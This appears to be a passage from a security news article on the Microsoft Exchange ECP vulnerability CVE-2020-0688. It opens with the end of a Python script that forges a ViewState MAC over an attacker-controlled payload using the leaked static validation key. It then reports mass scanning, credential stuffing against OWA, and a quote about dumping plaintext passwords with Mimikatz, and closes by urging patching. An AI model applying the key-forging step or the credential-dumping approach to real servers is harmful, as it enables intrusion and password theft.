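    STATIC_VALIDATION_KEY, "7A1D0C3E5B9F24C8E16A3D0F9B2C4E6A8D1F3B5C7E9A0B2D")

if __name__ == "__main__":
    payload = b"<serialized object the attacker controls>"
    mac = forge_with_static_key(payload)
    print("checking", ECP_WEB_CONFIG)
    for name, cfg in (("unpatched", VULNERABLE_CONFIG), ("patched", PATCHED_CONFIG)):
        key = machine_key(cfg)["validationKey"]
        print(name, "static key:", uses_static_key(cfg),
              "accepts forged ViewState:", server_accepts(key, payload, mac))
```

Against the unpatched config the forged MAC validates; against a per-install key it does not, which is the whole fix. The audit side is deliberately conservative: a config whose validationKey differs from the static one is treated as patched, so a server that was re-keyed by hand rather than by the update also passes.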


Well-known information security experts Kevin Beaumont and Troy Mursch of Bad Packets are already warning about mass scanning of the network in search of vulnerable servers.

“CVE-2020-0688 mass scanning activity has begun. That was quick, since 2 hours ago seeing likely mass scanning for CVE-2020-0688 (Microsoft Exchange 2007+ RCE vulnerability),” writes Kevin Beaumont.

Experts point out that authentication on the target servers is not an obstacle for the attackers. They gather employee names from LinkedIn, derive likely usernames from them, and then use credential stuffing against Outlook Web Access (OWA) and ECP to obtain a valid account.

“This vulnerability just spills credentials. You are logged in with SYSTEM privileges. Start Mimikatz. Exchange stores user credentials in memory, in plain text format, so you end up with all user passwords without hashing,” writes Kevin Beaumont.

Administrators of vulnerable servers are advised to install the patches as soon as possible.

I also recall that recently Microsoft advised administrators to disable the SMBv1 protocol on Exchange servers to protect against threats that exploit its vulnerabilities.
